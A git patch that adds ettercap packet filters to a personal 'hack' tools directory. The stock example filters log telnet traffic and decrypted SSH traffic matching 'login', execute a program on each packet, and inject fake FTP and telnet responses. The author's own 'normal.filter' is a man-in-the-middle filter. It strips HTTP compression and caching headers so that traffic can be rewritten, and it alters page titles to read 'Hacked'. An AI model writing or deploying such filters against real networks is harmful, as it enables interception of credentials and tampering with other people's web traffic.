From a089094d5a01083ff190e51cf86e975972c81923 Mon Sep 17 00:00:00 2001
From: acevest <zhaoyanbai@126.com>
Date: Tue, 25 Nov 2014 20:34:53 +0800
Subject: [PATCH] add normal.filter

---
 tools/hack/ettercap/etter.filter          |  26 ++++++
 tools/hack/ettercap/etter.filter.examples | 101 ++++++++++++++++++++++
 tools/hack/ettercap/normal.filter         |  21 +++++
 3 files changed, 148 insertions(+)
 create mode 100644 tools/hack/ettercap/etter.filter
 create mode 100644 tools/hack/ettercap/etter.filter.examples
 create mode 100644 tools/hack/ettercap/normal.filter

diff --git a/tools/hack/ettercap/etter.filter b/tools/hack/ettercap/etter.filter
new file mode 100644
index 0000000..002094a
--- /dev/null
+++ b/tools/hack/ettercap/etter.filter
@@ -0,0 +1,26 @@
+############################################################################
+#                                                                          #
+#  ettercap -- etter.filter -- filter source file                          #
+#                                                                          #
+#  Copyright (C) ALoR & NaGA                                               #
+#                                                                          #
+#  This program is free software; you can redistribute it and/or modify    #
+#  it under the terms of the GNU General Public License as published by    #
+#  the Free Software Foundation; either version 2 of the License, or       #
+#  (at your option) any later version.                                     #
+#                                                                          #
+############################################################################
+
+##
+#
+#  This filter will substitute the word 'ethercap' with 'ettercap' and
+#  will log the content of the packet in /tmp/mispelled_ettercap.log
+#  It is only a dummy example.
+##
+
+if (ip.proto == TCP && search(DATA.data, "ethercap") ) {
+   log(DATA.data, "/tmp/mispelled_ettercap.log");
+   replace("ethercap", "ettercap");
+   msg("Correctly substituted and logged.\n");
+}
+
diff --git a/tools/hack/ettercap/etter.filter.examples b/tools/hack/ettercap/etter.filter.examples
new file mode 100644
index 0000000..bed8dbd
--- /dev/null
+++ b/tools/hack/ettercap/etter.filter.examples
@@ -0,0 +1,101 @@
+############################################################################
+#                                                                          #
+#  ettercap -- etter.filter.examples -- filter source file                 #
+#                                                                          #
+#  Copyright (C) ALoR & NaGA                                               #
+#                                                                          #
+#  This program is free software; you can redistribute it and/or modify    #
+#  it under the terms of the GNU General Public License as published by    #
+#  the Free Software Foundation; either version 2 of the License, or       #
+#  (at your option) any later version.                                     #
+#                                                                          #
+############################################################################
+
+# make sure this filter will not be used...
+exit();
+
+
+# display a message if the tcp port is 22
+if (ip.proto == TCP) {
+   if (tcp.src == 22 || tcp.dst == 22) {
+      msg("SSH packet\n");
+   }
+}
+
+
+# log all telnet traffic, also execute ./program on every packet
+if (ip.proto == TCP) {
+   if (tcp.src == 23 || tcp.dst == 23) {
+      log(DATA.data, "./logfile.log");
+      exec("./program");
+   }
+}
+
+
+# log all traffic except http
+if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) {
+   log(DATA.data, "./logfile.log");
+}
+
+
+# some operation on the payload of the packet
+if ( DATA.data + 20 == 0x4142 ) {
+   DATA.data + 20 = 0x4243;
+} else {
+   DATA.data = "modified";
+   DATA.data + 20 = 0x4445;
+}
+
+
+# drop any packet containing "ettercap"
+if (search(DECODED.data, "ettercap")) {
+   msg("some one is talking about us...\n");
+   drop();
+   kill();
+}
+
+
+# log ssh decrypted packets matching the regexp
+if (ip.proto == TCP) {
+   if (tcp.src == 22 || tcp.dst == 22) {
+      if (regex(DECODED.data, ".*login.*")) {
+         log(DECODED.data, "./decrypted_log");
+      }
+   }
+}
+
+# dying packets
+if (ip.ttl < 5) {
+   msg("The packet will die soon\n");
+}
+
+# string comparison at a given offset
+if (DATA.data + 40 == "ette") {
+   log(DATA.data, "./logfile");
+}
+
+# inject a file after a specific packet
+if (tcp.src == 21 && search(DATA.data, "root")) {
+   inject("./fake_response");
+}
+
+# replace the entire packet with another
+if (tcp.src == 23 && search(DATA.data, "microsoft")) {
+   drop();
+   inject("./fake_telnet");
+}
+
+# filter only a specific ip address
+if (ip.src == '192.168.0.2') {
+   drop();
+}
+
+# translate the port of the tcp packet from 80 to 81
+if (tcp.dst == 80) {
+   tcp.dst -= 1;
+   tcp.dst += 2;
+}
+
+# eof
+
+# vim:ts=3:expandtab
diff --git a/tools/hack/ettercap/normal.filter b/tools/hack/ettercap/normal.filter
new file mode 100644
index 0000000..3434524
--- /dev/null
+++ b/tools/hack/ettercap/normal.filter
@@ -0,0 +1,21 @@
+if (ip.proto == TCP && tcp.dst == 80) {
+    if (search(DATA.data, "Accept-Encoding")) {
+        replace("Accept-Encoding", "Accept-Nothing.");
+    }
+
+    if (search(DATA.data, "If-None-Match")) {
+        replace("If-None-Match", "No-None-Match");
+    }
+
+    if (search(DATA.data, "If-Modified-Since")) {
+        replace("If-Modified-Since", "No-Modified-Since");
+    }
+}
+
+if (ip.proto == TCP && tcp.src == 80) {
+    replace("keep-alive", "close");
+}
+
+if (ip.proto == TCP && tcp.src == 80) {
+    replace("<title>", "<title>Hacked");
+}
-- 
2.44.0